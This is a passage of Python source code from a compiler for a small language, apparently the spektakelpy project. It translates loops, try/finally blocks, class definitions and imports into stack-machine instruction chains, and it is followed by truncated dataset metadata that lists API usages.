consequence = self.translate_statement(consequence, node.consequence, dec, on_error)\n consequence.append_jump(successor)\n alternative = self.translate_statement(alternative, node.consequence, dec, on_error)\n alternative.append_jump(successor)\n return successor\n elif isinstance(node, While):\n head = Chain()\n body = Chain()\n successor = Chain()\n chain.append_jump(head)\n condition, head = self.translate_expression(head, node.condition, dec, on_error)\n head.append_guard({condition: body, ~condition: successor}, on_error)\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n body = self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(head)\n return successor\n elif isinstance(node, For):\n \"\"\"\n A for loop is syntactic sugar for:\n it = xs.__iter__()\n while True:\n try:\n pattern = it.__next__()\n except StopIteration:\n break\n \n \"\"\"\n\n stopper = Chain()\n body = Chain()\n successor = Chain()\n\n iterable, chain = self.translate_expression(chain, node.iterable, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(iterable, \"__iter__\"), dec, on_error)\n iterator, chain = self.emit_call(chain, callee, [], on_error)\n\n self.declare_pattern(chain, node.pattern, on_error)\n\n chain.append_jump(body)\n\n callee, body = self.translate_expression(body, Attribute(iterator, \"__next__\"), dec, on_error)\n element, body = self.emit_call(body, callee, [], stopper)\n\n s = terms.IsInstance(terms.Read(ExceptionReference()), TStopIteration.instance)\n stopper.append_guard({s: successor, ~s: on_error}, on_error)\n successor.append_update(ExceptionReference(), 
terms.CNone(), on_error)\n\n head = self.emit_assignment(chain, node.pattern, dec, element, on_error)\n\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(body)\n return successor\n elif isinstance(node, Try):\n\n body = Chain()\n handler = Chain()\n restoration = Chain()\n finally_head = Chain()\n successor = Chain()\n exception = self.declare_name(body, None, on_error)\n self._blocks.push(BlockStack.ExceptionBlock(exception, finally_head))\n self.translate_statement(body, node.body, dec, handler)\n body.append_jump(finally_head)\n\n # As the very first step, the exception variable of the task is cleared:\n handler.append_update(exception, terms.Read(ExceptionReference()), on_error)\n handler.append_update(ExceptionReference(), terms.CNone(), on_error)\n\n for h in node.handlers:\n sc = Chain()\n hc = Chain()\n handler, t = self.translate_expression(handler, h.type, dec, finally_head)\n match = terms.IsInstance(exception, t)\n handler.append_guard({match: hc, ~match: sc}, finally_head)\n\n self._decl2ref[h] = exception\n hc = self.translate_statement(hc, h.body, dec, finally_head)\n hc.append_jump(finally_head)\n\n handler = sc\n\n # If none of the handlers apply, restore the exception variable and jump to the finally:\n handler.append_jump(restoration)\n\n restoration.append_update(ExceptionReference(), terms.Read(exception), on_error)\n restoration.append_update(exception, terms.CNone(), on_error)\n restoration.append_jump(finally_head)\n\n self._blocks.pop()\n\n if node.final is not None:\n # The finally clause first stashes the current exception and return value away:\n returnvalue = self.declare_name(finally_head, None, on_error)\n finally_head.append_update(exception, terms.Read(ExceptionReference()), on_error)\n finally_head.append_update(ExceptionReference(), terms.CNone(), on_error)\n finally_head.append_update(returnvalue, terms.Read(ReturnValueReference()), on_error)\n finally_head.append_update(ReturnValueReference(), terms.CNone(), on_error)\n # Then it executes its body:\n finally_foot = self.translate_statement(finally_head, node.final, dec, on_error)\n # Then it restores the stashed exception and return value:\n finally_foot.append_update(ReturnValueReference(), terms.Read(returnvalue), on_error)\n finally_foot.append_update(ExceptionReference(), terms.Read(exception), on_error)\n finally_foot.append_update(returnvalue, terms.CNone(), on_error)\n else:\n finally_foot = finally_head\n\n # Then it decides where to jump to, depending on the exception that caused the finally to be entered:\n e = terms.Read(ExceptionReference())\n condition_return = terms.IsInstance(e, types.TReturnException())\n condition_break = terms.IsInstance(e, types.TBreakException())\n condition_continue = terms.IsInstance(e, types.TContinueException())\n\n condition_exception = terms.IsInstance(e, types.TException()) & ~condition_break & ~condition_continue & ~condition_return\n condition_termination = terms.Comparison(ComparisonOperator.IS, e, terms.CNone)\n finally_foot.append_guard({condition_termination: successor,\n condition_return: self.emit_return(on_error),\n condition_break: self.emit_break(on_error),\n condition_continue: self.emit_continue(on_error),\n condition_exception: on_error,\n }, on_error)\n\n return successor\n elif isinstance(node, VariableDeclaration):\n self.declare_pattern(chain, node.pattern, on_error)\n if node.expression is not None:\n chain = 
self.emit_assignment(chain, node.pattern, dec, node.expression, on_error, declaring=True)\n return chain\n elif isinstance(node, ProcedureDefinition):\n if not isinstance(self._blocks[-1], (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n raise NotImplementedError(\"Code generation for procedure definitions on levels other than module level \"\n \"or class level has not been implemented yet!\")\n\n _, chain = self._emit_procedure(chain, node.name, node.argnames, node.body, dec, on_error)\n return chain\n\n elif isinstance(node, PropertyDefinition):\n\n getter, chain = self._emit_procedure(chain, None, [\"self\"], node.getter, dec, on_error)\n setter, chain = self._emit_procedure(chain, None, [\"self\", node.vname], node.setter, dec, on_error)\n\n # A property is a special kind of descriptor (see https://docs.python.org/3/glossary.html#term-descriptor).\n # A property object does not have private data. It only holds the getter and the setter. Both those\n # methods take an instance as argument and then read/write that.\n\n name = self.declare_pattern(chain, node.name, on_error)\n chain = chain.append_update(name, terms.NewProperty(getter, setter), on_error)\n return name, chain\n\n elif isinstance(node, ClassDefinition):\n if not isinstance(self._blocks[-1], BlockStack.ModuleBlock):\n # This would be probelamtic, because the type might incorporate local variables from the current function\n # stack. This is difficult to implement for the same reason that nested function declarations are.\n raise NotImplementedError(\"Code generation for class definitions on levels other than module level \"\n \"has not been implemented yet!\")\n\n self._blocks.push(BlockStack.ClassBlock(0))\n\n name = self.declare_pattern(chain, node.name, on_error)\n\n super_classes = []\n for s_expression in node.bases:\n s_term = self.translate_expression(chain, s_expression, dec, on_error)\n super_classes.append(s_term)\n\n # We create a new Namespace object and put it into the stack frame.\n chain = chain.append_push()\n chain = chain.append_update(FrameReference(0), terms.NewNamespace(), exit)\n\n chain = self.translate_statement(chain, node.body, dec, on_error)\n\n chain = chain.append_update(name, terms.NewClass(super_classes, terms.Read(FrameReference(0))), on_error)\n chain = chain.append_pop()\n\n self._blocks.pop()\n\n return chain\n\n elif isinstance(node, (ImportNames, ImportSource)):\n\n ms = check_type(dec[node.source], ModuleSpecification)\n subnames = list(map(str, node.source.identifiers[1:]))\n\n if isinstance(node, ImportSource):\n mapping = {}\n if node.alias is None:\n if not (len(node.source.Identifiers) == 1):\n raise NotImplementedError(\"Code generation for a source import that contains dots has not been implemented!\")\n name = node.source.Identifiers[0]\n else:\n name = node.alias\n elif isinstance(node, ImportNames):\n if node.wildcard:\n raise NotImplementedError(\"Compilation of wildcard imports has not been implemented!\")\n mapping = {alias.name: name.name for name, alias in node.aliases.items()}\n name = None\n else:\n raise NotImplementedError(\"Code generation for nodes of type {}\"\n \" has not been implemented!\".format(type(node)))\n\n return self.emit_import(chain, ms, subnames, name, mapping, on_error)\n else:\n raise NotImplementedError()\n\n def emit_preamble(self):\n \"\"\"\n Emits code that is to run once at the beginning of execution.\n :return: A Chain object.\n \"\"\"\n\n \"\"\" We generate code for this:\n \n var mcv = {}\n\n def ___import___(location):\n try:\n return 
mcv[location]\n except KeyError:\n m = ___call___(location, [Module()])\n mcv[location] = m\n return m\n \n del mcv\n \"\"\"\n\n preamble = Chain()\n panic = Chain()\n\n d = self.declare_name(preamble, None, panic)\n d = AbsoluteFrameReference(0, 0, d.index)\n preamble.append_update(TRef(d), NewDict(), panic)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n imp_code = Chain()\n load1 = Chain()\n load2 = Chain()\n exit = Chain()\n l = self.declare_name(imp_code, None, panic)\n imp_code.append_push(CTerm(VDict.get), [Read(TRef(d)), Read(TRef(l))], load1)\n imp_code.append_pop()\n load1.append_push(Read(TRef(l)), [], exit)\n error = terms.Comparison(ComparisonOperator.NEQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n load1.append_guard({error: exit, negate(error): load2}, panic)\n load2.append_push(CTerm(VDict.set), [Read(TRef(d)), Read(TRef(l)), Read(TRef(ReturnValueReference()))], panic)\n load2.append_jump(exit)\n exit.append_pop()\n self._blocks.pop()\n\n self._import_procedure = VProcedure(1, imp_code.compile())\n\n return preamble\n\n def translate_module(self, nodes, dec):\n \"\"\"\n Generates code for an entire module.\n :param nodes: An iterable of statements that represent the code of the module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n\n # We assume that somebody put a fresh frame on the stack.\n\n block = Chain()\n entry = block\n exit = Chain()\n\n # We create a new Namespace object and put it into the stack frame.\n block.append_update(TRef(FrameReference(0)), terms.NewNamespace(), exit)\n\n # The code of a module assumes that there is 1 argument on the current stack frame, which is the Namespace object\n # that is to be populated. All allocations of local variables must actually be members of that Namespace object.\n self._blocks.push(BlockStack.ModuleBlock(0))\n\n # Import the builtin names:\n for bms in self._builtin:\n block = self.emit_import(block, bms, [], None, {s: s for s in bms.symbols}, exit)\n\n # We execute the module code completely, which populates that namespace.\n for node in nodes:\n block = self.translate_statement(block, node, dec, exit)\n\n # Return a Module object. 
The preamble will store it somewhere.\n block.append_update(TRef(ReturnValueReference()), terms.NewModule(terms.Read(TRef(FrameReference(0)))), exit)\n\n block.append_pop()\n exit.append_pop()\n\n self._blocks.pop()\n\n return entry\n\n def translate(self, nodes, dec):\n \"\"\"\n Translate a standalone program.\n :param nodes: An iterable of statements that represent the code of the main module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n self._blocks.push(BlockStack.ModuleBlock(0))\n code = self.emit_preamble() + self.translate_module(nodes, dec)\n self._blocks.pop()\n return code", "repo_name": "gfhcs/spektakelpy", "sub_path": "lang/spek/dynamic.py", "file_name": "dynamic.py", "file_ext": "py", "file_size_in_byte": 55489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "engine.functional.terms.UnaryOperation", "line_number": 22, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryOperator.NOT", "line_number": 22, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryOperator", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 54, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 58, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 89, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 89, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 120, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 132, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 145, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 145, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 159, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 168, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 183, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 211, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 212, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 221, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 223, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 224, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 226, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 227, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 229, "usage_type": "call"}, {"api_name": "ast.Launch", "line_number": 230, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 232, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 239, "usage_type": "call"}, {"api_name": 
"engine.tasks.instructions.StackProgram", "line_number": 242, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 250, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 251, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 252, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 253, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 254, "usage_type": "call"}, {"api_name": "lang.translator.Translator", "line_number": 294, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 334, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 336, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 338, "usage_type": "argument"}, {"api_name": "ast.ClassDefinition", "line_number": 340, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 354, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 360, "usage_type": "call"}, {"api_name": "engine.functional.reference.NameReference", "line_number": 361, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 362, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 380, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 395, "usage_type": "argument"}, {"api_name": "ast.AssignableExpression", "line_number": 397, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 423, "usage_type": "argument"}, {"api_name": "engine.functional.terms.TRef", "line_number": 427, "usage_type": "call"}, {"api_name": "ast.Tuple", "line_number": 429, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Project", "line_number": 433, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 433, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 433, "usage_type": "call"}, {"api_name": "ast.Projection", "line_number": 434, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 435, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 438, "usage_type": "argument"}, {"api_name": "engine.functional.terms.StoreAttrCase", "line_number": 466, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 466, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 468, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 468, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 468, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 469, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 469, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 469, "usage_type": "attribute"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 484, "usage_type": "call"}, {"api_name": "ast.AssignableExpression", "line_number": 491, "usage_type": "argument"}, {"api_name": "util.check_type", "line_number": 514, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 514, 
"usage_type": "argument"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 518, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.ProgramLocation", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 521, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 524, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 527, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.CString", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewTypeError", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 548, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 550, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.NumArgs", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.CInt", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 556, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 560, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 561, "usage_type": "name"}, {"api_name": "ast.Constant", "line_number": 573, "usage_type": "argument"}, {"api_name": "engine.functional.terms.CBool", "line_number": 576, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 576, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 578, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 578, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", 
"line_number": 580, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 580, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 582, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 582, "usage_type": "name"}, {"api_name": "engine.functional.terms.CFloat", "line_number": 584, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 584, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 588, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 589, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 589, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 590, "usage_type": "argument"}, {"api_name": "engine.functional.terms.LoadAttrCase", "line_number": 594, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 594, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 596, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 596, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 596, "usage_type": "attribute"}, {"api_name": "ast.Call", "line_number": 610, "usage_type": "argument"}, {"api_name": "ast.Launch", "line_number": 618, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 626, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 626, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 626, "usage_type": "call"}, {"api_name": "ast.Await", "line_number": 628, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 631, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 631, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 631, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 635, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 639, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 640, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 640, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 641, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.Projection", "line_number": 643, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 646, "usage_type": "call"}, {"api_name": "ast.UnaryOperation", "line_number": 648, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryOperation", "line_number": 649, "usage_type": "call"}, {"api_name": "engine.functional.terms", 
"line_number": 649, "usage_type": "name"}, {"api_name": "ast.ArithmeticBinaryOperation", "line_number": 650, "usage_type": "argument"}, {"api_name": "engine.functional.terms.ArithmeticBinaryOperation", "line_number": 653, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 653, "usage_type": "name"}, {"api_name": "ast.Comparison", "line_number": 654, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 655, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 655, "usage_type": "name"}, {"api_name": "ast.BooleanBinaryOperation", "line_number": 658, "usage_type": "argument"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.AND", "line_number": 669, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 669, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 670, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 670, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.OR", "line_number": 671, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 671, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 672, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 672, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 674, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 674, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperation", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 679, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 681, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 681, "usage_type": "name"}, {"api_name": "ast.Tuple", "line_number": 682, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewTuple", "line_number": 683, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 683, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.values.VReturnError", "line_number": 701, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 701, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 708, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.values.VBreakError", "line_number": 727, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 727, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 731, "usage_type": 
"call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 731, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 731, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.values.VContinueError", "line_number": 752, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 752, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 756, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewProcedure", "line_number": 802, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 802, "usage_type": "name"}, {"api_name": "ast.Pass", "line_number": 825, "usage_type": "argument"}, {"api_name": "ast.ExpressionStatement", "line_number": 827, "usage_type": "argument"}, {"api_name": "ast.Assignment", "line_number": 833, "usage_type": "argument"}, {"api_name": "ast.Block", "line_number": 836, "usage_type": "argument"}, {"api_name": "ast.Return", "line_number": 840, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 843, "usage_type": "call"}, {"api_name": "ast.Raise", "line_number": 846, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 852, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 859, "usage_type": "call"}, {"api_name": "ast.Break", "line_number": 862, "usage_type": "argument"}, {"api_name": "ast.Continue", "line_number": 865, "usage_type": "argument"}, {"api_name": "ast.Conditional", "line_number": 868, "usage_type": "argument"}, {"api_name": "ast.While", "line_number": 879, "usage_type": "argument"}, {"api_name": "ast.For", "line_number": 891, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 908, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 915, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 918, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 920, "usage_type": "name"}, {"api_name": "ast.Try", "line_number": 929, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 942, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", 
"line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 943, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 949, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 949, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 961, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 962, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 962, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 970, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 971, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 972, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 973, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 977, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 978, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 979, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 979, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 984, "usage_type": 